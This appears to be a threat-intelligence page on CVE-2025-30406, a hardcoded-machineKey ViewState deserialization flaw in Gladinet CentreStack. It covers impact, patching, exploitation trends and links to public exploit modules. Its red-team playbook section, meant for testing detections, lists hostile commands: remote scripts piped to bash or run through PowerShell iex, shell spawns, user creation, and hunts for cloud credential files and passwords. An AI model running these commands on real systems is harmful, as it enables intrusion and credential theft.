CVE-2025-30406
Overview
This vulnerability is a server-side deserialization flaw caused by the use of a hardcoded machineKey within the Gladinet CentreStack portal's configuration. The machineKey, embedded in portal\web.config, is used for cryptographic operations related to ViewState deserialization. The flaw resides in the deserialization process of serialized payloads submitted to the CentreStack portal, specifically affecting the ASP.NET __VIEWSTATE mechanism in the loginpage.aspx endpoint.
Vulnerability Description
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution. NOTE: a CentreStack admin can manually delete the machineKey defined in portal\web.config.
Impact
An unauthenticated attacker with knowledge of the hardcoded machineKey can execute arbitrary code on the CentreStack server by submitting a crafted serialized payload. This results in full server compromise, including the ability to execute commands and manipulate data. No user interaction or authentication is required to exploit this vulnerability, enabling remote code execution and potentially complete control over the affected system.
Solution
Upgrade Gladinet CentreStack to version 16.4.10315.56368 or later, as detailed in the vendor's security advisory available at https://www.centrestack.com/p/gce_latest_release.html. As a temporary workaround, administrators can manually delete the hardcoded machineKey entry from the portal\web.config file to mitigate the vulnerability. Refer to the official advisory and the provided PDF at https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf for full patching instructions and additional guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The deserialization vulnerability in Gladinet CentreStack arises from the use of a hardcoded machineKey within the CentreStack portal. This machineKey is crucial for securing the serialization and deserialization processes, which are common in web applications for maintaining state and data integrity. When an application deserializes data, it reconstructs an object from a serialized format. If an attacker can manipulate this process, they can inject malicious payloads that the server will execute, leading to remote code execution. The presence of a hardcoded machineKey means that if an attacker discovers this key, they can craft a serialized payload that the server will accept, thereby compromising the application and potentially the underlying system.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker with knowledge of the hardcoded machineKey can create a malicious payload that, when deserialized by the CentreStack portal, executes arbitrary code on the server. This could be done through various means, such as phishing attacks to gain initial access or exploiting other vulnerabilities to gain knowledge of the machineKey. Once the attacker has the ability to send crafted requests to the server, they can execute commands, access sensitive data, or even pivot to other systems within the network. The exploitation of this vulnerability was noted to have occurred in the wild, highlighting its critical nature and the urgency for organizations to address it.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on Gladinet CentreStack for file sharing and collaboration. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential data breaches. The financial implications could be severe, including costs associated with incident response, legal liabilities, and reputational damage. Additionally, organizations may face regulatory scrutiny and compliance issues, especially if sensitive personal or financial data is compromised. The high CVSS score of 9.8 indicates that this vulnerability poses a critical risk, necessitating immediate attention from affected organizations.
To detect and mitigate this vulnerability, organizations should first ensure that they are running the latest version of Gladinet CentreStack, as the issue has been addressed in a subsequent release. Regularly updating software is a fundamental practice in cybersecurity hygiene. Additionally, organizations should conduct security assessments and penetration testing to identify potential weaknesses in their systems, including the presence of hardcoded keys or other insecure configurations. Implementing application security best practices, such as input validation and secure coding techniques, can help prevent similar vulnerabilities from being introduced in the future. Furthermore, organizations should monitor their systems for unusual activity that may indicate exploitation attempts, such as unexpected server behavior or unauthorized access attempts.
In conclusion, the deserialization vulnerability in Gladinet CentreStack represents a critical risk that can lead to severe consequences for affected organizations. Understanding the technical details, potential attack vectors, and real-world implications is essential for cybersecurity professionals tasked with safeguarding their environments. By implementing robust detection and mitigation strategies, organizations can protect themselves against such vulnerabilities and enhance their overall security posture.
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting the Gladinet CentreStack deserialization vulnerability, reflecting increased adversary interest and activity. This escalation is underscored by the emergence of additional proof-of-concept exploits on public repositories, which have gained traction among threat actors, potentially lowering the barrier for exploitation. Concurrently, telemetry indicates a rising trend in attempts to leverage the related path traversal vulnerability to extract sensitive configuration files, such as the machineKey, which is critical for crafting malicious ViewState payloads. This convergence of attack vectors amplifies the risk of successful remote code execution, elevating the overall threat landscape. While ransomware involvement remains unconfirmed, the growing exploitation activity and expanding toolkit availability suggest heightened operational tempo among malicious actors. Consequently, the risk assessment for CVE-2025-30406 should be considered elevated, with defenders facing increased urgency to detect and respond to exploitation attempts in environments running vulnerable versions of Gladinet CentreStack.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gladinet | Centrestack | All |
cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406
|
Huntress Team, H00die Gr3y | Unknown | - | View |
|
Gladinet CentreStack/Triofox Path Traversal
auxiliary/gather/gladinet_storage_path_traversal_cve_2025_11371
|
Huntress Team | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
mchklt/CVE-2025-30406
CVE-2025-30406 ViewState Exploit PoC
|
mchklt | 89 | 18 | 2025-07-31 | View |
|
W01fh4cker/CVE-2025-30406
Exploit for CVE-2025-30406
|
W01fh4cker | 12 | 4 | 2025-04-24 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-30406 |
| centrestack.com |
GitHub CVE
|
https://www.centrestack.com/p/gce_latest_release.html |
| gladinetsupport.s3.us-east-1.amazonaws.com |
GitHub CVE
|
https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-30406 |